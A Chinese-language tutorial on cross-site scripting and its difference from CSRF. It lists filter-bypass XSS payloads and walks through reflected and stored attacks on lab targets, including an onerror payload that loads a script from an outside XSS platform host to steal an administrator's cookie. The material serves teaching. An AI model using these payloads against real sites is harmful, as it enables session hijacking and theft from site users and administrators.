我要评论引文
上篇文章给大家带来了xml实体注入(xxe)不知道小伙伴们学了后有没有自己去运用,今天给大家带来了一个名为跨站脚本攻击(xss)的漏洞的介绍。
简介
xss 攻击全称跨站脚本攻击,xss 是一种在 web 应用中的安全漏洞,它允许攻击者将代码植入到 web 网站里面,供给其它用户 访问,当用户访问到有恶意代码的网页就会产生 xss 攻击。
xss与csrf区别
之前讲过csrf漏洞,它同样也是利用用户访问网站链接来进行攻击,那么它与xss漏洞之间的区别是什么,在我个人的理解中可以分为两个大方向:
one
原理不同,csrf利用的是网站本身的漏洞来去攻击,而xss则是将攻击代码插入网站中来进行攻击。
two
利用环境不同, csrf攻击中需要受害者登录网站,网站有认证信息才能攻击,而xss不用。
xss攻击方法
首先xss有三种攻击方式:
- 反射型xss:不会永久存储用户的数据,仅发生在用户的一次访问之后。
- 存储型xss:攻击代码被持久化保存在服务器上,不会因为一次访问就消失,持久攻击。
- dom型不需要与服务器端交互的,它只发生在客户端处理数据阶段。
接下来我会分开详细的讲解这几种类型是怎样利用的:
反射型
客户端通过某种方式向服务器端发送恶意js代码=>服务器将未过滤或过滤不彻底的恶意js代码输出(返回给浏览器)=>浏览器中的js解释器解析恶意js代码,使用户受到攻击。
一个经典的xss攻击请求,然网页弹出xss:
<script>alert(/xss/)</script>
当然不止这一个,很多情况下一些函数被过滤了,我们也有绕过过滤的方法,下面就简单列举几个:
<script>alert(vulnerable)</script>
%3cscript%3ealert('xss')%3c/script%3e
<script>alert('xss')</script>
<img src="javascript:alert('xss')">
<div style="background-image: url(javascript:alert('xss'))">
<div style="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<div style="width: expression(alert('xss'));">
1"><scscriptript>alert(1)</scscriptript>
接下来给大家带来一个渗透的例子:
我们打开靶机查看源码,发现它是向服务器提交了一个name参数,而这一个参数值插入到了<h3></h3>标签之间 ,因此可能存在xss漏洞。
于是我们构造请求,将name赋值为:
<script>alert('xss')</script>
一个经典的弹窗payload,我们提交请求查看效果:
成功弹窗,一次简单的反射xss攻击成功达成。
存储型
储型xss的特别之处在于提交的代码会存储在服务器端(数据库、内存、文件系统等),下次请求时目标页面时不用再提交xss代码。所以存储型xss的攻击效果更强,而且攻击的范围更广。一般存在于留言板评论等地区。 用一个靶机来给大家演示一下:
一个可以发表信息树洞网站,有登录和评论系统,我们先随便评论几句测试一下:
构造payload
<img src="javascript.:alert('xino');">
我们简单访问一下存储路径,发现是一个错报的图片,存在xss漏洞,接着我们利用xss平台(一个diy构造不同xss攻击功能代码的网站,当xss生效时可以回到网站查看攻击是否生效和攻击得出的信息)构造xsspayload
得到构造好的恶意攻击链接:
<img src=x onerror=s=createelement('script');body.appendchild(s);s.src='https://xss9.com/pans';>
提交在评论区然后访问保存路径,回到xss平台查看:
得到admin管理员的cookie,我们就可以通过修改cookie来获取管理员权限,从而进行进一步的渗透攻击。上面就是一个简单的存储型xss的利用。
dom型
攻击代码并不需要服务器解析响应,利用的是浏览器端的dom解析,在客户端直接输出dom内容的时候极易触发dom型xss漏洞。因为利用比较少,就放个简单payload:
<img src=1 onerror=alert(1)>
xss攻击危害
根据上文的演示大家也能看出来xss的危害了吧,这里就综合简述一下它的危害。
- 盗取各类用户帐号,如管理员帐号
- 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
- 网站挂马
- 强制发送电子邮件(钓鱼)
- 控制受害者机器(肉鸡)向其它网站发起攻击
结语
今天比较详细的讲了xss漏洞的原理以及应用方法,其中比较重要的是反射型xss与存储型xss,这两个的利用条件并不是很苛刻而且效果很突出,有兴趣的小伙伴可以自己去搭建靶机来进行合法测试,切勿随意对别人网站进行测试攻击,互联网并非法外之地,以上就是跨站脚本攻击xss与csrf区别方法详解的详细内容,更多关于跨站脚本攻击xss csrf的资料请关注代码网其它相关文章!
发表评论